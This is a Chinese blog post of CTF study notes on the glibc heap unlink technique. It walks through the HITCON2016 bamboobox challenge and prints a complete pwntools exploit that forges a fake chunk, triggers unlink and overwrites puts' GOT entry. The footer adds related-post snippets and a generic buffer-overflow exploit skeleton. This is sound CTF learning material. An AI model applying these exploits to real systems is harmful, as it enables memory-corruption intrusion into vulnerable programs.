【PWN-HEAP】Unlink学习笔记

最新推荐文章于 2024-06-25 15:52:20 发布
原创 最新推荐文章于 2024-06-25 15:52:20 发布 · 876 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细分析了HITCON2016bamboobox程序中的堆溢出漏洞,通过伪造结构体、改写内存区域及利用unlink操作,实现任意地址读写,最终调用magic函数获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目练习

HITCON2016 bamboobox

反编译情况:

在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

程序分析

把程序的功能阅读完成之后,发现这个程序用到一个结构体的数组用于管理结构体。
所以整理结构体如下:

struts Node{
   int size;
   char string[size];
}

从下图change_item() 中的代码可以看到,这里先输入一个长度,然后转化成int类型之后作为read读入的长度。
在这里插入图片描述若输入的长度大于malloc出来的长度,则可以造成堆溢出。
这里保存chunk的指针也保存在bss段(从qword_6020C8可以看出来,或者进行动态调试也行)。

EXP编写思路

这里的核心思想是将写数据从heap变成bss,也就是说借助堆溢出伪造fake_chunk->改写人工malloc的第二个chunk头部的inused标志->free( 人工malloc的第二个chunk )来触发unlink操作->改写保存chunk的指针内容为ptr-3*8(改写到了某个函数的got表)->调用该函数 -> 任意地址读写。

首先申请3个0x80大小的chunk,填入任意字符串,之后观察heap的内容:
在这里插入图片描述
接下来改写Chunk0里面的内容,伪造出一个fake_chunk,顺便溢出改写Chunk1的头部。
在这里插入图片描述此时ptr指针的内容如下:
在这里插入图片描述
紧接着Free掉Chunk1,触发unlink,向前(Chunk0)合并,然后这个时候的ptr变成如下内容
在这里插入图片描述
紧接着往0x6020b0里面填入数据,把0x6020b0~0x6020d0改成如下内容:
在这里插入图片描述最后一个操作就是UAF的操作,修改Chunk1,实际上就变成了修改0x602020(puts函数的GOT)里面的数据。此时如果改成magic函数的地址,再调用puts函数,实际上就是调用了magic函数。
在这里插入图片描述在这里插入图片描述#### 完整EXP:
这里参考网络上公开的EXP,感谢这位大神~

from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
context.terminal = ['terminator','-x','bash','-c']
cn = process('./bamboobox')
bin = ELF('./bamboobox')

itemlist = 0x00000000006020C0
p_chunk0 = itemlist+8

def add_item(length,name):
	cn.sendline('2')
	cn.recvuntil('the length of item name:')
	cn.sendline(str(length))
	cn.recvuntil('the name of item:')
	cn.sendline(name)

def change_item(index,length,name):
	cn.sendline('3')
	cn.recvuntil('the index of item:')
	cn.sendline(str(index))
	cn.recvuntil('the length of item name:')
	cn.sendline(str(length))
	cn.recvuntil('new name of the item:')
	cn.sendline(name)

def remove_item(index):
	cn.sendline('4')
	cn.recvuntil('the index of item:')
	cn.sendline(str(index))

def show_item():
	cn.sendline('1')
	data = cn.recvuntil('----------------------------')
	return data

add_item(256,'aaaaaaaa')#chunk0
add_item(256,'bbbbbbbb')#chunk1
add_item(256,'cccccccc')#chunk2

pay = p64(0)+p64(256+1)+p64(p_chunk0-0x18)+p64(p_chunk0-0x10)
pay += 'A'*(256-4*8)
pay += p64(256)+p64(256+0x10) + 'test'

change_item(0,len(pay),pay)

remove_item(1)

pay2 = '\x00'*0x18 + p64(p_chunk0-0x18) + p64(0) + p64(bin.got['puts'])
change_item(0,len(pay2),pay2)

change_item(1,16,p64(bin.symbols['magic']))
flag = cn.recv()

log.success("the flag is : "+flag)
pwn_heap(未完待续)
qq_37439229的博客
10-15 546
早上上信安数基,了解了中国剩余定理,就是求同余方程组的解,找时间,用c++复现以下 pwn_heap 堆 在程序运行过程中,堆可以提供动态分配的内存,允许程序申请大小未知的内存。堆其实就是程序虚拟地址空间的一块连续的线性区域,它由低地址向高地址方向增长。我们一般称管理堆的那部分程序为堆管理器。 malloc malloc 函数返回对应大小字节的内存块的指针。此外,该函数还对一些异常情况进行了处理 当 n=0 时,返回当前系统允许的堆的最小内存块。 当 n 为负数时,由于在大多数系统上,size_t 是无符号
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2455
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
一道Unlink pwn题 (非常好玩)
qq_41071646的博客
06-12 673
这个题目具体出处我现在还不知道 是某个学姐问我的 但是这个题确实很好玩 本来这个题我思路很多 但是 发现好多东西都限制特别多 加上我最近 很多事情都很烦心 (一堆考试 要复习 英语四级什么的还没有准备) 然后就把题 扔给 gou ri的负责人 但是不得不说这个题确实是我想复杂了 没有想到unlink 并且 unlink 我确实不太熟悉~~ 然后这个题目 运行库是 2.23 但是我...
CTF PWNheap入门 unlink
L2329794714的博客
09-09 1942
unlink的利用需要申请连续的chunk,为了方便我们先要让IO两个缓冲区都申请了,即程序执行至少以此IO输出,一次IO此输入(这里可以让程序执行一遍创建堆块的流程实现),后面再创建两个相邻的堆块,后面一个大小大于0x80,再前一个堆块里伪造一个释放状态的chunk,并利用堆溢出改写后一个chunk的P_size(伪造chunk的大小包括chunk头),和size(in_user为为0),然后free后面的chunk来触发前合并,从而进行unlink。P:为要取出的chunk指针(指向chunk头的)
Heap-Unlink一谈
qq_41252520的博客
08-12 488
前话 原理在这就不说了,很多博主说得都非常的详细,我也是从他们那里学到的。本篇主要就是讲解常见的Unlink利用。主要分为有泄漏操作和无泄漏操作。 有泄漏操作就是能够输出堆中的信息,无泄漏就是不能泄露堆中的信息。 有泄漏操作 ZCTF-2016-note2 【保护】: RELRO保护一定要非常注意,如果是这种情况下(部分开启),说明任意函数的got表都可写;如果是完全开启(FULL)...
PWN练习---Heap_1
qq_74259765的博客
06-25 1137
pwn--堆题部分做题的wp
学习笔记】CTF PWN选手的养成(三)
prettyX的博客
12-04 1367
atum大佬视频的总结 第三章 课时2 堆漏洞的利用技巧 0X01 基础知识 1、操作系统中的内存布局(Linux) 内核空间&用户空间,堆、栈等;cat /proc/pid/maps 要了解ELF文件结构 2、什么是堆? 数据结构:父节点总大于/小于子节点的特殊的完全二叉树 操作系统:程序在运行时动态申请和释放的内存空间(malloc,realloc,free,new,d...
BUUCTF 2021-10-4 Pwn
m0_56897090的博客
10-04 535
文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffer overflow 0分析EXPXCTF-Mary_Morton分析EXPEXPgift分析EXPfishin
heap 漏洞 unlink
samohyes的博客
06-05 576
看了好久没看懂、、、一知半解,把链接放这里,慢慢看内存管理机制https://jaq.alibaba.com/community/art/show?spm=a313e.7916648.0.0.680125d6KB9x2z&articleid=334漏洞利用http://manyface.github.io/2016/05/19/AndroidHeapUnlinkExploitPractic...
unlink函数_PWN-浅析unlink
weixin_39522103的博客
12-11 776
my blog:http://www.pwn4fun.com/About the unlinkunlink,在CTF中是比较常见的知识点。What’s the unlinkunlink_chunk函数用于将空闲的chunk从所在的bin中取出( 把一个双向链表中的空闲块拿出来),可以使用下图描述。可能触发unlink的情形:malloc_consolidate()函数将fastbin中的空闲chu...
unlink - pwnable
SkYe's Blog
09-30 542
预习知识 什么是unlinked unlinked 是堆溢出中的一种常见形式,通过将双向列表中的空闲块拿出来与将要free的物理相邻的块进行合并。(将双向链表上的chunk卸载下来与物理chunk合并) unlink漏洞条件 有3个以上的空闲chunk链表,其中最前面的chunk存在有堆溢出 unlink的触发 当使用free函数释放正在使用的chunk时,会相应地检查其相邻的chunk是否空闲...
CTF用户态pwn总结(二) Unlink
weixin_41918450的博客
09-26 1773
CTF用户态pwn总结(二) Unlink unlink是CTF中非常常见的一种题型 unlink时的一些性质 unlink是在free掉一个chunk的时候,如果与之相邻的chunk是free状态,并且不是投票chunk时,会将chunk从原来的链表中unlink,并触发合并,fast bin并不会触发合并,只有当满足条件触发fast bin合并时,即当申请的chunk大小大于fast bins...
我又pwn啦——理论篇 unlink
m0_64195960的博客
06-20 692
1)定义:在双向链表中取出一个chunk的操作2)使用时间:1、malloc·在恰好大小的large chunk处取chunk时·在比请求大小大的bin中取chunk时2、Free·后向合并,合并物理相邻低物理地址空闲chunk时·前向合并,合并物理相邻高物理地空闲chunk时(top chunk除外)3、malloc_consolidate·后向合并,合并物理相邻低地址空闲chunk时·前向合并,合并物理相邻高地址空闲chunk时(top chunk除外)4、realloc前向扩展,合并物理相邻高地址空闲
D0g2019-pwn heap WP
qq_41252520的博客
12-04 346
保护 分析 程序主要漏洞有两个,分别是在一开始的输入操作中: 存在格式化字符串漏洞,可以泄露内存。这里首先泄露出程序的基地址和libc的内存,为后续利用做准备。 第二个漏洞存在编辑操作中: 程序在创建note的时候做了限制,正常情况下只能申请unsortbin及其以上的chunk。由于一开始我们就可以获得内存,所以直接利用unlink是最快的,然后利用IO_FILE去getshell。 ...
星盟-pwn-heap2 (tcache attack,house of orange)
qq_65147345的博客
08-08 1385
通过unsorted-bin泄露出libc_base 通过tcache attack申请到malloc_hook的地址 改写为one_gadget
PWN之堆利用-unlink攻击
susuate的博客
07-18 1880
环境配置 笔者使用ubuntu14.04.6_desktop_i386 国内镜像网站如下: http://mirrors.aliyun.com/ubuntu-releases/14.04/ glibc版本2.20 unlink攻击
CTF(pwn) 堆利用 之 unlink 介绍
半岛铁盒的博客
07-01 1009
unlink是链表中常见的操作,而我们需要利用这个过程 通过改变链表指针,使中间堆块拿出来 当前的unlink会有一个对链表的完整性检查的 // 由于 P 已经在双向链表中,所以有两个地方记录其大小,所以检查一下其大小是否一致(size检查) if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0)) \ malloc_printerr ("corrupted size vs. prev_size");
linux内核pwn,浅谈Linux Pwn Unlink机制
weixin_31361715的博客
04-29 556
unlink是堆溢出中的一种常见的利用形式,通过将双向列表中的空闲块拿出来与将要free的物理相邻的块进行合并。unlink对于最初接触的人来说机制比较难以理解,笔者会结合unlink的实现源码以及使用gdb调试对unlink进行阐述。unlink的触发当使用free函数释放正在使用的chunk时,会相应地检查其相邻的chunk是否为空闲,如果为空闲则会将相邻的chunk与free的chunk进行...
ptmalloc heap unlink exploit
MillionSky的专栏
05-21 749
1 概述Heap unlink exploit 前提是要对ptmalloc堆有一定的了解。2 UnlinkUnlink:用来将一个双向 bin 链表中的一个 chunk 取出来参数:AV:arena header(malloc_state)P :将要unlink的chunkBK:P后面的chunk    <--FD:P前面的chunk    -->具体过程如下:将chunk从FD/B...
攻防世界pwn pwn-100
最新发布
01-18
### 关于攻防世界PWN-100题目的解答 #### 解决方案概述 对于攻防世界的PWN-100题目,通常涉及的是基础的缓冲区溢出攻击。这类题目旨在测试参赛者对Linux防护机制的理解程度以及绕过这些保护措施的能力。常见的技术包括但不限于返回导向编程(Return-Oriented Programming, ROP)、重定向到已知位置的shellcode执行(ret2shellcode)或是利用动态链接库中的函数实现系统命令调用(ret2libc)[^1]。 #### 技术细节 当面对没有启用地址空间布局随机化(ASLR)且未开启不可执行堆栈(NX bit off)的情况时,可以直接采用`ret2shellcode`的方式解决问题。此方法要求选手能够找到足够的空间放置自定义的shellcode,并通过控制EIP指向这段代码来完成最终的目标——通常是打开一个远程shell连接给攻击者[^3]。 如果遇到开启了NX位但是禁用了位置独立可执行文件(PIE),那么可以考虑使用`ret2libc`策略。这种方法依赖于将返回地址设置为标准C库(glibc)内的某个有用功能的位置,比如system()函数,从而间接地触发所需的恶意操作而无需注入新的机器码片段。 针对具体环境下的不同情况,还需要掌握诸如IDA Pro这样的反汇编工具来进行二进制分析工作;同时熟悉GDB调试技巧以便更好地理解程序内部逻辑并定位潜在的安全漏洞所在之处。 ```python from pwn import * # 连接到远程服务 conn = remote('challenge.ctf.games', PORT) # 发送payload前先接收初始消息 print(conn.recvline()) # 构造payload offset = 64 # 假设偏移量为64字节 junk = b'A' * offset return_address = pack('<I', 0xdeadbeef) # 替换为目标地址 exploit_payload = junk + return_address # 发送payload conn.send(exploit_payload) # 接收响应数据 result = conn.recvall() print(result.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值